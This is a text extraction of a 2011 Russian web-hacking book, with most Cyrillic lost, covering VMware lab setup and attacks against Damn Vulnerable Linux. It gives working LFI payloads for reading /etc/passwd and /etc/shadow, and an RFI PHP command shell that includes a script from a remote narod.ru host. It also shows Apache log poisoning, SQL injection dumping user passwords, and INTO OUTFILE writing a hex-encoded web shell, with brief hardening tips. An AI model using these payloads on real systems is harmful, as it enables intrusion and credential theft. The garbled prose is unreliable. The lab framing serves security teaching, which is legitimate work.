Вы находитесь на странице: 1из 176

2

32.988-018-07
004.738.52
85

85

. .
-: (+DVD). .: , 2011.
176 .: .
ISBN 978-5-4237-0184-0
-,
. ,
, , . Linux
Damn Vulnerable Linux Back Track 4,
Windows.
,
.
, .

32.988-018-07
004.738.52

. .
, , ,
. , ,

, .

, 2011

ISBN 978-5-4237-0184-0


00. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
I. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
01. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
02. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
II. - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
03. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
04. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
05. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
06. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
07. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
08. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
09. CRLF- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
III. ?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
0A. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
0B. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
0C. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
0D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
0E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
0F. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
12. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
13. IT- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
1. *nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
2. SQL- show.php Cyphor . . . . . . . . . . . . . . . . . . 140
3. Cyphor . . . . . . . . . . . . . . . . . . . . . . 144
4. SQL-
Cyphor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5. SQL- MS SQL Jet . . . . . . . . . . . . . . . . . . . . . . . . . . 152
6. nabopoll.php . . . . . . . . . . . . . . . 155
7. SQL-
MS Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
8.
instantCMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
9. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166


00. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
I. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
01. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
02. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
II. - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
03. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
04. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
PHP- NaboPoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
- Apache . . . . . . . . . . . 41
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
05. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
06. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
-, XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
<script> . . . . . . . . . . . . . . . . . . . . . . . . . . . 67

07. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
MySQL @@version . . . . . . . . . . . . . . 71
mysql.user . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
SQL- NaboPoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
08. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
/proc/self/environ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
09. CRLF- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
III. ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
0A. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
0B. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
0C. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
*nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
LDAP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
MD5- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
0D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
0E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
0F. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
10. . . . . . . . . . . . . . . . . . . . . . . . . . 124
11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
12. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
13. IT- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
. . . . . . . . . . . . . . . . . . . 131
ICQ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
1. *nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
2. SQL- show.php Cyphor . . . . . . . . . . . . . . 140
3. Cyphor . . . . . . . . . . . . . . . . 144

4. SQL-
Cyphor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5. SQL- MS SQL Jet . . . . . . . . . . . . . . . . . . . . . 152
6. nabopoll.php . . . . . . . . . . . 155
7. SQL-
MS Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
8.
instantCMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
9. SQL- . . . . . . . . . . . . . . . . . . . . . 161
find_in_set(substr, strlist) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
find_in_set() + more1row . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166

00


,
. ( ,
, ), - -,
.
, .
, .
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).


, 1995 1999
( , ,

10

). ,
. , ,
. .
2002
( 2004 ). .


DVD-
Linix, Damn Vulnerable Linux Back Track 4.
,
, 02.

PHP.
, ,
.
,
comp@piter.com ( , ).
!
-
http://www.piter.com.

10

 01.
 02.

11

01

. *nix Unix- ( , AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD - ).
Windows
Microsoft ,
Windows. , , ,
.

-
:
-? - c. , , ,
- .
- -, . ,
, ,
, , ,
.
- , , ,
, ( ).
- ,
. , ,
-,
.
-:
 ( );
 ;

12

13

 ;
 ( ,
).
. .
. Hacked by . (,
. .). , , , -
. , .
( .)
. . , -
, . :
,

.
. , ,
. , .
(
Windows) ( *nix).
, , ;
, -
.
. - ,
( )

. , , .
, , .
, . ,
- ,
, . ,
.
, .

13

14

01.


, , IP. - (proxy), ,
( ). ,
. ,
, . ,
. (),
, -
. ,
-, . -
, , ,
.
, , . , - ftp-.
free proxy list
.
, IP- (, www.2ip.
ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). , (
VPN ). VPN
.

. ,
, ,
. ,
.ru. , www.hidemyass.com.
.
,

14

15

( ), .
.
.
, , ,
. (.gov) (.mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( ) . , , ,
, .
,
.
.
,
, ,
.

15

02

, ,
().
Linix, Damn Vulnerable Linux Back Track 4.

DVD.

. Damn Vulnerable Linux (


, DVL) Back Track 2.
DVL 1.5.
: www.damnvulnerablelinux.org.
(: ). DVL
(live-CD),
. ,
,
. , , .
. ? (
Windows), ,
.
,
.
VMware VirtualBox. VMware Player, .
(-) www.vmware.com/
products/player/, www.VMware.com/Download. VMware.

16

17

DVL VMware,
Other Linux 2.6.x
kernel ( , 2.6). VMVare,
512 .

Back Track 4. www.backtrack-linux.org/downloads/.

BT4 VMware,
Linux Ubuntu.

, Linux , Linux,
. .

. 02.1. VMware Player

17

18

02.

, VMware Player .
( ,
), ,
VMware Player -.
, .
1. VMware Player. , . 02.1.
Create a New Virtual Machine ().
2. , . 02.2,
Installer disk image file (iso) Damn Vulnerable
Linux, Browse. C:\Damn Vulnerable
Linux 1.5, DVL_1.5_Infectious_Disease.iso. Next.

. 02.2. , 1

3. , . 02.3,
Next.
4. (. 02.4)
. ,
DVL DamnVulnerableLinux, . Next.

18

19

. 02.3. , 2

. 02.4. , 3

5. . 02.5.
, , 8 , DVL

19

20

02.

2 , 8
(
). , 2 , Split virtual
disk into 2 GB files, .
, , 2 ,
. Next.

. 02.5. , 4

6. , Finish ( 02.6).
512 , 256
Damn Vulnerable Linux .
Customize Hardware.
7. . 02.7. , (796 ). 2 ( ),
. , , - A Auto
detect (). , , , OK.
, . 02.6.
Finish, .

20

. 02.6. , 5

. 02.7. , 6

21

21

22

02.

.
. 02.8. Removable Devices (
), OK.
I Finished Installing ( ),
Linux
. , Ctrl, , , G ( Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).

. 02.8.

root Enter.
(password) toor ( root )
Enter. , :
bt ~ # _

22

23

bt , # , . # $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx

, .
Linux, , Windows
( , Windows), .
- ,
,
( Linux),
, .

. 02.9. KDE

23

24

02.

,
. 02.9.
KDE. Firefox ( )
. , Windows-.

( ), (de). , ,
.
,
. (Ctrl+Alt),
VMPowerSuspend.
. VMware Player.
Back Track 4,
, , , Linux Ubuntu, Linux,
I Finished Installing ( ).

24

II
-

 03.
 04. PHP-
 05. SQL-
 06.
 07. SQL-
 08. PHP-
 09. CRLF-

25

03

- - -, . - .
. . (bug) .
- -, .
, (, PHP).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD ( ). Konqueror ( Windows). Start HTTPD
OK. , - . ,
Konqueror , -.
( http://) Location
Enter.
Board51, - (http://localhost). (Firefox Konqueror)

http://localhost/webexploitation_package_02/board51/board.php

, , (. 03.1).
, , , ,
*nix-. Windows
(, C D) D:\\Inetpub\wwwroot\board51\.
, -
Apache ( - *nix-,

26

27

. 03.1. Board51

Windows). , - ,
- (-) . ,
, (Internet Explorer, Opera, Firefox . .), , , -. - -
(, ), -,
, . .
, Board51 , . , , ,
. boarddata/data/user.idx
, , ICQ . , ,
. ( , , ,
,
.)

http://localhost/webexploitation_package_02/board51/boarddata/data/user.idx

27

28

03.

. 03.2. user.idx Board51

user.idx (. 03.2).
, (Admin),
( ) :
21232f297a57a5a743894a0e4a801fc3

MD5 (Message Digest 5).


,
( ). ,
-, .
, http://hash.insidepro.com/
index.php?lang=rus (. 03.3). InsidePro, .
, CAPTCHA , ,
(). :
21232f297a57a5a743894a0e4a801fc3:admin

http://localhost/webexploitation_
package_02/board51/board.php (. . 03.1), Benutzername

Admin ( ),
(admin) Anmelden.
(Warning), Cancel. ,
Enter.
(. 03.4). ,
! , .

28

29

. 03.3. -

. 03.4. Board51

, IP- .
. , , .

29

30

03.

IP- , . ,
TCP/IP, IP-, .
IP 4 IP- ( 0 254), , :
192.168.2.11. () IP-, ,
IP- 127.0.0.1.
, .
1 65 535.
, .
- , , . , - 80, FTP 21.
, ,
, , . ,
, , IP-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.

30

04

PHP-

PHP, -,
include(), -
. PHP, . ( . include
[-]). (Local File Include,
LFI) (Remote File Include, RFI).
.
, ,
HTTP FTP . , ,
. .

PHP-

. :
http://[target]/index.php?page=./../../../../../etc/passwd%00

[target] ,
www.site.com. /etc/passwd. :
 ./ ;
 ../ , Unix- .
%00
HTTP (null-byte).
. ,
,
.php .txt.
: /etc/passwd.php, .
, .

31

32

04. PHP-


index.php . , DamnVulnerableLinux
- /usr/local/apache/htdocs/. ,
(
../) 4 , .
, htdocs,
. ,
-,
, , .
/usr/local/apache/htdocs/ -. ,
, -,
.
( Windows)
Damn Vulnerable LinuxToolsEditorsKate, Kate ( , ,
). Default Session ( , , , DVL ).
( (!)):
<?
$page = ($_GET['page']);
include("./htdocs/$page.php");
?>

(-)? PHP. , , .
$page,
page, .
htdocs (
$page)
.php. . , ( ) . ,
, ,
. ( FileSave)
/usr/local/apache/htdocs. , , Enter
. .
my.php , Save.
, .php.
, .
(Firefox Konqueror)
:
http://localhost/my.php?page=./../etc/passwd%00

32

PHP-

33

localhost ( : www.site.com).
, . 04.1.

. 04.1. /etc/passwd

!
../ ,
http://localhost/my.php?page=./../../etc/passwd%00
http://localhost/my.php?page=./../../../etc/passwd%00
...

, /etc/passwd, . 04.2.
! !
/etc/passwd , : . .
ViewView Document Source ( Konqueror)
ViewPage Source ( Firefox)
(. 04.3).

33

34

04. PHP-

. 04.2. /etc/passwd

. 04.3. /etc/passwd

/etc/passwd? , () .
. (
root). root () 0 0. x
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
. ? , .
,

34

PHP-

35

, /etc/shadow.
, .
/etc/shadow root , root.
,
. , ,
,
( 0). , Linux - /etc/shadow .

http://localhost/my.php?page=./../../../../../etc/shadow%00

, , root, - Apache, ,
,
Permission denied ( , ).
/etc/shadow , .
%00 (
)
http://localhost/my.php?page=./../../../../../etc/passwd%00

, . /etc/shadow, ,
? ?

. .

PHP-
, , , .

PHP, *nix, .

http://[target]/inj.php?inc=http://narod.ru/cmd.txt&cmd=ls

cmd.txt
http://narod.ru. ls,
.

35

36

04. PHP-

(FileNew)
:
<?
$page = ($_GET['page']);
include("$page");
?>

-.
my.php
inj.php (FileSave As) , my.php.
, include htdocs
.php, ,
. ,
.
, (,
FTP). .

<pre>
<?php
print("<b>$cmd</b>\n");
system($cmd);
?>
</pre>

cmd.php , inj.php.
HTML <pre> </pre> ,
(
). print $cmd
, . system() ,
$cmd, .
, ,
:
http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls

, - . 04.4.
ls, .
, - , .
inj.php cmd.php,
Parse error: , , ,
. .

36

PHP-

37

. 04.4. ls

, ls *nix-.
, uname ( Unix-,
).
pwd (print working directory ) id ( ).
, nobody (
uid=99), nogroup (
gid=99). , ,
groups. , Linux-
- nobody.
dir, , ls, , .
, , .
, .
, ( . shell ) *nix-,

(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, *nix- . Unix
(- ), (-- )

37

38

04. PHP-

. , uname -a Unix-. ,
. , ls -la
,
( *nix ).

Linux Unix ,
- .

, ls -al ls -la. -
. ,
.
? Linux $IFS,
().
ls$IFS-la. , ,
! . 04.5.
-:
<pre><?

system($_GET['cmd']);?></pre>

, + ,
ls -la ls+-la. .
. 04.5 .
(total). drwxr-xr-x? d , (-).
, ,
, ,
:
 r (read);
 w (write);
 x (execute).
:
-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam A1 2 May 01 12:01 directory


( , . 04.5
root, , , bob sam).
, .

38

PHP-

39

. 04.5. ls -la

() ,
. . 04.5 root ( ).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc

, (rwx),
, (r-x),
(r--). , 18 2009
(Jan 18 2009).
ls -lad.
. ( root) chown
. () chmod. ,
, ( 7 ) ,

39

40

04. PHP-

( 5) (
5):
chmod 755 < >

, ,
.
, , :
0 ;
1 ;
2 ;
3 ;
4 ;
5 ;
6 ;
7 (, ).
( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix. 1.

PHP-
NaboPoll
NaboPoll
( survey.inc.php, path) , ( , , ) .
, , :
http://localhost/webexploitation_package_02/nabopoll/
survey.inc.php?path=http://localhost/cmd.php?cmd=ls%00

. 04.6.

40

- Apache

41

. 04.6. ls NaboPoll

-
Apache
, -, () Apache. ,
Apache - httpd-access.log httpd-error.log, - (
access.log, , , error.log).
DVL : access_log error_log,
/usr/local/apache/logs. ,
access_log -,
. :
httpd://localhost/index.php?page=./../../logs/access_log%00

access_log.
telnet 80 :
telnet 127.0.0.1 80

:
GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1

41

42

04. PHP-

Enter 400 (. 04.7),


-, <pre><?passthru
($_GET['cmd']);?></pre>, access_log error_log
:
error_log:
[error] [client 127.0.0.1] Invalid URI in request GET <pre><?passthru
($_GET['cmd']);?></pre> HTTP/1.1

access-log:
127.0.0.1 - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET['cmd']);?>
</pre> HTTP/1.1

. 04.7. - Apache

- , ,
, PHP
, , .
, , access_log,
.
, GET, .
- Referer User-Agent,
( !):
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.1

42

- Apache

43

Accept: */*
Accept-Language: en
Accept-Encoding: deflate
User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
Host: 127.0.0.1
Connection: Close
Referer: http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>

Enter.
Referer. User-Agent.
:
httpd://localhost/index.php?page=./../logs/access_log%00&cmd=ls+-la

- +, ls -la.
.
access_log,
(. 04.8).
error_log . ,
ftpd ( FTP), , Apache, - ( ,

. 04.8. - access_log

43

44

04. PHP-

- ).
, , , txt, log . .
, .
. , .
- <pre><? passthru($_GET['cmd']);?><pre>, avatar.gif
, :
http://[target]/forum.php?page=./../smileys/avatar.gif%00&cmd=ls

.
, avatar.gif ,

- .


-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/httpd/error.log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/access_log


, c (switch case). PHP-:

44

45

<?php
global $page;
switch ($page)
{
case '':
include ("pages/main.php");
break;
case 'index':
include ("pages/main.php");
break;
case 'page1':
include ("pages/page1.php");
break;
case 'page2':
include ("pages/page2.php");
break;
default:
include ("pages/error.php");
break;
}
?>

str_replace().
, php.ini :
allow_url_include = Off
allow_url_fopen = Off
register_globals = Off
magic_quotes_gpc=On
safe_mode = On

//
//
//
//
//
//


fopen

" " (%00)
safe_mode,
/etc/passwd


PHP-,
:
<?php
function stripslashes_for_array(&$array)
{
reset($array);
while (list($key, $val) = each($array))
{
if (is_string($val)) $array[$key] = stripslashes($val);
elseif (is_array($val)) $array[$key] = stripslashes_for_array($val);
}

45

46

04. PHP-
return $array;
}
if (!get_magic_quotes_gpc())
{
stripslashes_for_array($_POST);
stripslashes_for_array($_GET);
}
if(isset($_GET['file']))$file=$_GET['file'];
else
{
if(isset($_POST['file']))$file=$_POST['file'];
else $file='';
}
$file=str_replace('/','',$file);
$file=str_replace('.','',$file);
if(!file_exists("include".'/'.$file.'.php')||$file =='index')
{
$file='news';
}
include("include".'/'.$file.'.php');

?>

?
stripslashes(), . ,
. ('/'
'.') str_replace(). (
file_exists()), $file='news'.
.
- ,
-, , . .

46

05

SQL-

SQL- Cyphor.
http://localhost/webexploitation_package_02/cyphor/ ,
. 05.1.

. 05.1. Cyphor

newmsg.php . Kate,
exit()
# ( . 05.2 ) . newmsg.php
Cyphor. ,
Cyphor
.
, , newmsg.php SQL fid ( ). SQL-

47

48

05. SQL-

. 05.2. newmsg.php

(SQL-injection)? SQL,
. SQL (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users. , (,
). SQL-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users

,
. , UNION , . , ,
SELECT, .

. (1, 2, 3...), (
), (null)
SQL-. .
( FROM),
, . , cyphor_users,

48

SQL-

49

nick () password ().


:
union select 1 from cyphor_users

:
http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1
from cyphor_users

, , . SQL,
() MySQL,
/* ( --),
. . 05.3.

. 05.3. SQL- newmsg.php

, SQL
( ), ,
.
,
(%20). , (+) /**/,
.
, .
(union select 1,2,3,4 from cyphor_users),
(. 05.4). ,
, .

49

50

05. SQL-

. 05.4. UNION SELECT

2. nick ( ,
Cyphor). . 05.5
( admin).

. 05.5. (admin)

2 password admin (. 05.6).


Cyphor crypt(),
(

50

SQL-

51

. 05.6. admin

). PHP
, ,
Cyphor , 8 , , . ,
DES,
John The Ripper (. 0). , Cyphor ( ),
(. 3).
MySQL ( ),
MySQL . , ,
version(), user() database().
concat_ws:
concat_ws(0x3a,version(),user(),database())

().
:
5.0.24a:root@localhost:cyphor


concat, :
concat(name,0x3a,id)

,
group_concat, :
group_concat(password)

Cyphor,
, ( ).

51

52

05. SQL-

/etc/passwd.
MySQL load_file('etc/passwd').
( ), :
load_file(0x2f6574632f706173737764)

, (. 05.7).

. 05.7. /etc/passwd load_le

2 SQL- show.
php, 4 SQL- .
.
, param
SQL-:
param=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

,
SQL- ,1. ,
.
, SQL- :
param=1+union+select+1,2,concat(user_name,0x25, password,0x25, email),4,5,6,7,8,9,10
,11,12,13,14,15 from p_user ,1

,
, (-- /*), . ? LIMIT,

52

53

. :
param=1+union+select+1,2,concat(user_name,0x25, password,0x25, email),4,5,6,7,8,9,10
,11,12,13,14,15 from p_user LIMIT 0

,1 SQL :
param=1+union+select+1,2,concat(user_name,0x25, password,0x25, email),4,5,6,7,8,9,10
,11,12,13,14, 15 from p_user LIMIT 0,1

.
1 ( ), WHERE:
param=1+union+select+1,2,concat(user_name,0x25, password,0x25, email),4,5,6,7,8,9,10
,11,12,13,14,15 from p_user WHERE 1=

:
param=1+union+select+1,2,concat(user_name,0x25, password,0x25, email),4,5,6,7,8,9,10
,11,12,13,14,15 from p_user WHERE 1=1

WHERE 1=1 SQL ( 1 = 1)


,
.
, id=31,
(, +, *, /), (, 1 0).
, (/* --).
,
( SQL).


select ...into outfile , -.
/usr/local/apche/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select ...into outfile , SELECT, .
SQL- newmsg.php.

53

54

05. SQL-

Cyphor user.txt
:
select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/
local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'

:
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select
1, concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile /usr/local/
apache/htdocs/webexploitation_package_02/cyphor/user.txt

, , http://localhost/webexploitation_package_02/cyphor/user.txt,
(. 05.8).
admin.

. 05.8. Cyphor

, . ,
, (null).
4 , ( , 2). ,
, .

-
, outfile
-.
hex. .
union select 1,2,3,4 :
hex("<pre><?

system($_GET['cmd']);?></pre>")

54

55

. 05.9 , .

. 05.9. - hex

( ) ,
,
0x ( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0
x37072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E
,null,null,null into outfile '/usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'

-
shell.php, ,
, :
http://localhost/webexploitation_package_02/cyphor/shell.php?cmd=ls+-la

. 05.10.
, , , SQL. ,
.
SQL-? .

DVL - ( :
--- sql injection).
, . .
(, ComicShout v.2).

55

56

05. SQL-

. 05.10. -

SQL-
, , , SQL-. , show.php
Cyphor. :
$message_mode = 1;

:
$id = intval($id);
if (!$id)
{
die("<br><h1>Hacking attempt!"</h1>);
}

, id ,
, . ,
. . 05.11.
, fid,
.
, , . :
$text_to_check = mysql_real_escape_string ($_GET[""]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecialchars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = addslashes($text_to_check);
$_GET[""] = $text_to_check;

56

SQL-

57

. 05.11. show.php

SQL,
select, union, order, char, where, from.
, , . ,
(, ):
ini_set('display_errors', '0');


.

. , , , ,
SQL-. PHP 5:
$section = $_GET[section];
$result = mysql_query ("SELECT * FROM
'tbl_name' WHERE 'section' = $section ");
if (!$result || mysql_num_rows ($result) == 0) {

//

//
//
//
header ("Location: http://$_SERVER[HTTP_HOST]/"); //
//
